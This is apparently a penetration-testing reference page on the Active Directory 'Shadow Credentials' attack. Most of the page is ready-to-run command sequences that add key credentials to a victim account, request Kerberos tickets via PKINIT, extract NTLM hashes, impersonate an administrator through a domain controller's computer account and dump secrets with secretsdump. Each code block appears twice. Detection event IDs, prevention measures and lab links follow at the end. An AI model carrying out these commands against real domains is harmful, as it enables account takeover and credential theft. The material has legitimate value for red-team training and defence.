Exploitation

Shadow Credentials

Exploit write access to the msDS-KeyCredentialLink attribute to add a key credential, enabling PKINIT authentication and obtaining NTLM hashes without knowing the password.

T1556 T1098 T1649

Information

Shadow Credentials requires: Domain functional level 2016+, PKINIT support, and write access to target's msDS-KeyCredentialLink attribute.

Tool Installation

pywhisker

Python shadow creds

pip install pywhisker

Whisker

C# shadow creds

github.com/eladshamir/Whisker

Certipy

PKINIT support

pip install certipy-ad

PKINITtools

PKINIT utilities

github.com/dirkjanm/PKINITtools

Attack Prerequisites

Requirements Check

  • ✅ Domain Functional Level 2016 or higher
  • ✅ At least one Domain Controller running Server 2016+
  • ✅ Write access to target's msDS-KeyCredentialLink attribute
  • ✅ Target account not protected by AdminSDHolder (or attack AdminSDHolder)
powershell 
# Check domain functional level
Get-ADDomain | Select-Object DomainMode

# Check who has write access to KeyCredentialLink
# GenericAll, GenericWrite, or WriteProperty on msDS-KeyCredentialLink
Get-ADObject -Identity "CN=Target,CN=Users,DC=corp,DC=local" -Properties nTSecurityDescriptor | 
    Select-Object -ExpandProperty nTSecurityDescriptor | 
    Select-Object -ExpandProperty Access | 
    Where-Object {$_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty"}
# Check domain functional level
Get-ADDomain | Select-Object DomainMode

# Check who has write access to KeyCredentialLink
# GenericAll, GenericWrite, or WriteProperty on msDS-KeyCredentialLink
Get-ADObject -Identity "CN=Target,CN=Users,DC=corp,DC=local" -Properties nTSecurityDescriptor | 
    Select-Object -ExpandProperty nTSecurityDescriptor | 
    Select-Object -ExpandProperty Access | 
    Where-Object {$_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty"}

Adding Shadow Credentials

Using pywhisker (Linux)

bash 
# Add shadow credentials to target user
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action add

# This outputs:
# - A certificate PFX file
# - The password for the PFX
# - Command to use with gettgtpkinit.py

# Get TGT using PKINIT
python3 gettgtpkinit.py corp.local/victimuser victimuser.ccache -cert-pfx victim.pfx -pfx-pass <password>

# Export ticket
export KRB5CCNAME=victimuser.ccache

# Get NTLM hash via U2U
python3 getnthash.py corp.local/victimuser -key <AS-REP key from previous command>
# Add shadow credentials to target user
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action add

# This outputs:
# - A certificate PFX file
# - The password for the PFX
# - Command to use with gettgtpkinit.py

# Get TGT using PKINIT
python3 gettgtpkinit.py corp.local/victimuser victimuser.ccache -cert-pfx victim.pfx -pfx-pass <password>

# Export ticket
export KRB5CCNAME=victimuser.ccache

# Get NTLM hash via U2U
python3 getnthash.py corp.local/victimuser -key <AS-REP key from previous command>

Using Whisker (Windows)

powershell 
# Add shadow credentials
Whisker.exe add /target:victimuser

# Output includes Rubeus command
# Use Rubeus to get TGT and NTLM hash
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /nowrap /ptt

# Alternative: Get hash directly
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /getcredentials
# Add shadow credentials
Whisker.exe add /target:victimuser

# Output includes Rubeus command
# Use Rubeus to get TGT and NTLM hash
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /nowrap /ptt

# Alternative: Get hash directly
Rubeus.exe asktgt /user:victimuser /certificate:<base64cert> /password:<password> /getcredentials

Targeting Computer Accounts

Shadow credentials on computer accounts allows privilege escalation through S4U2Self abuse.

bash 
# Add shadow creds to computer account (need write access)
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target 'DC01$' --action add

# Get TGT for computer
python3 gettgtpkinit.py corp.local/'DC01$' dc01.ccache -cert-pfx dc01.pfx -pfx-pass <password>

# S4U2Self to impersonate admin
python3 gets4uticket.py kerberos+ccache://corp.local\DC01$:dc01.ccache@DC01.corp.local cifs/DC01.corp.local@corp.local administrator@corp.local administrator.ccache

# Use ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass DC01.corp.local
# Add shadow creds to computer account (need write access)
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target 'DC01$' --action add

# Get TGT for computer
python3 gettgtpkinit.py corp.local/'DC01$' dc01.ccache -cert-pfx dc01.pfx -pfx-pass <password>

# S4U2Self to impersonate admin
python3 gets4uticket.py kerberos+ccache://corp.local\DC01$:dc01.ccache@DC01.corp.local cifs/DC01.corp.local@corp.local administrator@corp.local administrator.ccache

# Use ticket
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass DC01.corp.local

Cleanup

bash 
# List current shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action list

# Remove specific device ID
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action remove --device-id <DeviceID>

# Clear all shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action clear

# Whisker cleanup (Windows)
Whisker.exe list /target:victimuser
Whisker.exe remove /target:victimuser /deviceid:<DeviceID>
# List current shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action list

# Remove specific device ID
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action remove --device-id <DeviceID>

# Clear all shadow credentials
python3 pywhisker.py -d corp.local -u attacker -p 'Password123' --target victimuser --action clear

# Whisker cleanup (Windows)
Whisker.exe list /target:victimuser
Whisker.exe remove /target:victimuser /deviceid:<DeviceID>

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • • Event 5136 - msDS-KeyCredentialLink attribute modified
  • • Event 4768 - Kerberos TGT request with certificate
  • • Monitor for unexpected PKINIT authentication
  • • Audit changes to high-value accounts
  • • Look for certificate-based auth from unusual sources

Prevention Measures

  • • Audit write permissions on user/computer objects
  • • Implement tiered administration model
  • • Monitor msDS-KeyCredentialLink changes
  • • Regular audit of key credentials
  • • Protected Users group for high-value accounts

External Resources

Shadow Credentials - SpecterOps

Original research by Elad Shamir

pywhisker - GitHub

Python shadow credentials tool

Whisker - GitHub

C# shadow credentials tool

HackTricks - Shadow Credentials

Attack walkthrough and examples
🎯

Practice Labs

Practice Shadow Credentials attacks

📦
Support Hack The Box easy
LDAPShadow Credentials
Open Lab
📦
Absolute Hack The Box insane
Shadow CredentialsRBCD
Open Lab
Need help setting up? Check our Lab Setup Guide →

Related Topics

ADCS Attacks

Certificate-based attacks

LAPS Abuse

Local admin password abuse

AD Exploitation

AD attack techniques